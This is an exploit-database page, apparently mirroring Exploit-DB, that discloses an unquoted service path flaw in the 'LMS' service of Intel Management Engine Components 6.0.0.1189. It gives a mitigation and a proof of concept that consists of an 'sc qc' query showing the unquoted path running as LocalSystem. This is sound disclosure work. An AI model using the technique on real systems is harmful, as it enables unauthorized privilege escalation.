header-logo
Suggest Exploit
vendor:
Intel(R) Management Engine Components
by:
SamAlucard
7.8
CVSS
HIGH
Unquoted Service Path
73
CWE
Product Name: Intel(R) Management Engine Components
Affected Version From: 6.0.0.1189
Affected Version To: 6.0.0.1189
Patch Exists: NO
Related CWE:
CPE: a:intel:intel_management_engine_components:6.0.0.1189
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 Pro
2022

Intel(R) Management Engine Components 6.0.0.1189 – ‘LMS’ Unquoted Service Path

The Intel(R) Management Engine Components 6.0.0.1189 contains a vulnerability in the 'LMS' service, which allows an attacker to gain elevated privileges by exploiting an unquoted service path.

Mitigation:

Ensure that all service paths are properly quoted and that all services are running with the least privileges necessary.
Source

Exploit-DB raw data:

#Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-17
#Vendor :  Intel
#Version : Intel(R) Management Engine Components 6.0.0.1189
#Vendor Homepage : https://www.intel.com
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============

C:\>sc qc LMS
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: LMS
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R)
Management Engine Components\LMS\LMS.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Intel(R) Management and Security Application
Local Management Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem